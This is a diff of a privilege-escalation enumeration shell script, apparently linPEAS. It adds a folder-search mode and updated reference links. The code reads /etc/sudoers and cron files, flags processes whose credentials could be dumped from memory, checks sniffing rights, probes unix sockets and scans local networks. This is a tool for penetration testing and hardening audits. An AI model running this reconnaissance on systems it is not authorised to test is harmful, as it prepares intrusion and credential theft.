grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," + fi + echo "" +fi + +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PCS) Files opened by processes belonging to other users + if ! [ "$IAMROOT" ]; then + print_2title "Files opened by processes belonging to other users" + print_info "This is usually empty because of the lack of privileges to read other user processes information" + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + echo "" + fi +fi + +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PCS) Processes with credentials inside memory + print_2title "Processes with credentials in memory (root req)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory" + if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi + if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi + if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi + if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi + if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi + if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi + echo "" +fi + +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PCS) Different processes 1 min + if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then + print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs" + temp_file=$(mktemp) + if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi + echo "" + fi +fi + +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PCS) Cron + print_2title "Cron jobs" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs" + command -v crontab 2>/dev/null || echo_not_found "crontab" + crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + command -v incrontab 2>/dev/null || echo_not_found "incrontab" + incrontab -l 2>/dev/null + ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" + cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + crontab -l -u "$USER" 2>/dev/null | tr -d "\r" + ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths + atq 2>/dev/null +else + print_2title "Cron jobs" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs" + find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \; fi echo "" -#-- PCS) Files opened by processes belonging to other users -if ! [ "$IAMROOT" ]; then - print_2title "Files opened by processes belonging to other users" - print_info "This is usually empty because of the lack of privileges to read other user processes information" - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - echo "" + +if ! [ "$SEARCH_IN_FOLDER" ]; then + if [ "$MACPEAS" ]; then + print_2title "Third party LaunchAgents & LaunchDemons" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" + ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null + echo "" + + print_2title "Writable System LaunchAgents & LaunchDemons" + find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + program="" + program=$(defaults read "$f" Program 2>/dev/null) + if ! [ "$program" ]; then + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + fi + if [ -w "$program" ]; then + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + done + echo "" + + print_2title "StartupItems" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" + ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null + echo "" + + print_2title "Login Items" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" + osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null + echo "" + + print_2title "SPStartupItemDataType" + system_profiler SPStartupItemDataType + echo "" + + print_2title "Emond scripts" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" + ls -l /private/var/db/emondClients + echo "" + fi fi -#-- PCS) Processes with credentials inside memory -print_2title "Processes with credentials in memory (root req)" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" -if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi -if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi -if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi -if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi -if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi -if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi -echo "" - -#-- PCS) Different processes 1 min -if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then - print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" - temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi - echo "" +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PCS) Services + if [ "$EXTRA_CHECKS" ]; then + print_2title "Services" + print_info "Search for outdated versions" + (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" + echo "" + fi fi -#-- PCS) Cron -print_2title "Cron jobs" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" -command -v crontab 2>/dev/null || echo_not_found "crontab" -crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," -command -v incrontab 2>/dev/null || echo_not_found "incrontab" -incrontab -l 2>/dev/null -ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" -cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," -crontab -l -u "$USER" 2>/dev/null | tr -d "\r" -ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths -atq 2>/dev/null -echo "" - -if [ "$MACPEAS" ]; then - print_2title "Third party LaunchAgents & LaunchDemons" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" - ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null - echo "" - - print_2title "Writable System LaunchAgents & LaunchDemons" - find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do - program="" - program=$(defaults read "$f" Program 2>/dev/null) - if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) - fi - if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - done - echo "" - - print_2title "StartupItems" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" - ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null - echo "" - - print_2title "Login Items" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" - osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null - echo "" - - print_2title "SPStartupItemDataType" - system_profiler SPStartupItemDataType - echo "" - - print_2title "Emond scripts" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" - ls -l /private/var/db/emondClients +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PSC) systemd PATH + print_2title "Systemd PATH" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths" + systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" + WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") echo "" fi -#-- PCS) Services -if [ "$EXTRA_CHECKS" ]; then - print_2title "Services" - print_info "Search for outdated versions" - (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" - echo "" -fi - -#-- PSC) systemd PATH -print_2title "Systemd PATH" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" -systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" -WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") -echo "" - #-- PSC) .service files #TODO: .service files in MACOS are folders print_2title "Analyzing .service files" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services" printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do - if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + if [ ! -O "$s" ] || [ "$SEARCH_IN_FOLDER" ]; then #Remove services that belongs to the current user or if firmware see everything + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" fi servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths @@ -1807,17 +2432,19 @@ done if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi echo "" -#-- PSC) Timers -print_2title "System timers" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" -(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found -echo "" +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PSC) Timers + print_2title "System timers" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers" + (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found + echo "" +fi #-- PSC) .timer files print_2title "Analyzing .timer files" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers" printf "%s\n" "$PSTORAGE_TIMER" | while read t; do - if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + if ! [ "$IAMROOT" ] && [ -w "$t" ] && ! [ "$SEARCH_IN_FOLDER" ]; then echo "$t" | sed -${E} "s,.*,${SED_RED},g" fi timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) @@ -1837,9 +2464,9 @@ echo "" #TODO: .socket files in MACOS are folders if ! [ "$IAMROOT" ]; then print_2title "Analyzing .socket files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets" printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" fi socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') @@ -1855,27 +2482,27 @@ if ! [ "$IAMROOT" ]; then fi done done - if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then - echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" - fi - if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then - echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" - fi echo "" - - print_2title "Unix Sockets Listening" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - # Search sockets using netstat and ss - unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") - fi - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) + + if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Unix Sockets Listening" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets" + # Search sockets using netstat and ss + unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) + if ! [ "$unix_scks_list" ];then + unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") + fi + if ! [ "$unix_scks_list" ];then + unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) + fi fi - # But also search socket files - unix_scks_list2=$(find / -type s 2>/dev/null) + if ! [ "$SEARCH_IN_FOLDER" ]; then + # But also search socket files + unix_scks_list2=$(find / -type s 2>/dev/null) + else + unix_scks_list2=$(find "SEARCH_IN_FOLDER" -type s 2>/dev/null) + fi # Detele repeated dockets and check permissions (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do @@ -1886,10 +2513,20 @@ if ! [ "$IAMROOT" ]; then if [ -w "$l" ];then perms="${perms}Write" fi + + if [ "$EXTRA_CHECKS" ] && [ "$(command -v curl)" ]; then + CANNOT_CONNECT_TO_SOCKET="$(curl -v --unix-socket "$l" --max-time 1 http:/linpeas 2>&1 | grep -i 'Permission denied')" + if ! [ "$CANNOT_CONNECT_TO_SOCKET" ]; then + perms="${perms} - Can Connect" + else + perms="${perms} - Cannot Connect" + fi + fi + if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; else echo "$l" | sed -${E} "s,$l,${SED_RED},g" - echo " └─(${RED}${perms}${NC})" + echo " └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g" # Try to contact the socket socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) if [ $? -eq 0 ]; then @@ -1904,11 +2541,11 @@ fi #-- PSC) Writable and weak policies in D-Bus config files print_2title "D-Bus config files" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus" if [ "$PSTORAGE_DBUS" ]; then printf "%s\n" "$PSTORAGE_DBUS" | while read d; do for f in $d/*; do - if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + if ! [ "$IAMROOT" ] && [ -w "$f" ] && ! [ "$SEARCH_IN_FOLDER" ]; then echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" fi @@ -1930,21 +2567,23 @@ if [ "$PSTORAGE_DBUS" ]; then fi echo "" -print_2title "D-Bus Service Objects list" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" -dbuslist=$(busctl list 2>/dev/null) -if [ "$dbuslist" ]; then - busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; - if ! echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "D-Bus Service Objects list" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus" + dbuslist=$(busctl list 2>/dev/null) + if [ "$dbuslist" ]; then + busctl list | while read line; do + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; + if ! echo "$line" | grep -qE "$dbuslistG"; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," + fi fi - fi - done -else echo_not_found "busctl" + done + else echo_not_found "busctl" + fi fi fi @@ -2009,7 +2648,7 @@ fi #-- NI) Ports print_2title "Active Ports" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports" ( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," echo "" @@ -2048,14 +2687,14 @@ fi print_2title "Can I sniff with tcpdump?" timeout 1 tcpdump >/dev/null 2>&1 if [ $? -eq 124 ]; then #If 124, then timed out == It worked - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sniffing" echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" #-- NI) Internet access -if ! [ "$SUPERFAST" ] && [ "$EXTRA_CHECKS" ] && ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then +if [ "$AUTO_NETWORK_SCAN" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then print_2title "Internet Access?" check_tcp_80 2>/dev/null & check_tcp_443 2>/dev/null & @@ -2065,11 +2704,15 @@ if ! [ "$SUPERFAST" ] && [ "$EXTRA_CHECKS" ] && ! [ "$FAST" ] && [ "$TIMEOUT" ] echo "" fi -if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then - if ! [ "$FOUND_NC" ]; then +if [ "$AUTO_NETWORK_SCAN" ]; then + if ! [ "$FOUND_NC" ] && ! [ "$FOUND_BASH" ]; then printf $RED"[-] $SCAN_BAN_BAD\n$NC" echo "The network is not going to be scanned..." + elif ! [ "$(command -v ifconfig)" ] && ! [ "$(command -v ip a)" ]; then + printf $RED"[-] No ifconfig or ip commands, cannot find local ips\n$NC" + echo "The network is not going to be scanned..." + else print_2title "Scanning local networks (using /24)" @@ -2078,7 +2721,7 @@ if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then fi select_nc - local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") + local_ips=$( (ip a 2>/dev/null || ifconfig) | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") printf "%s\n" "$local_ips" | while read local_ip; do if ! [ -z "$local_ip" ]; then print_3title "Discovering hosts in $local_ip/24" @@ -2107,6 +2750,10 @@ if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then echo "" fi done + + print_3title "Scanning top ports of host.docker.internal" + (tcp_port_scan "host.docker.internal" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null + echo "" fi fi @@ -2138,6 +2785,7 @@ if [ "$MACOS" ]; then echo "" fi fi + fi echo '' echo '' @@ -2151,7 +2799,7 @@ print_title "Users Information" #-- UI) My user print_2title "My user" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users" (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" echo "" @@ -2206,26 +2854,26 @@ fi #-- UI) Sudo -l print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" -print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" -(echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" +(echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" + (echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g") 2>/dev/null || echo_not_found "sudo" fi -( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" +( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" ) 2>/dev/null || echo_not_found "/etc/sudoers" if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi for filename in '/etc/sudoers.d/*'; do if [ -r "$filename" ]; then echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" - grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," + grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} 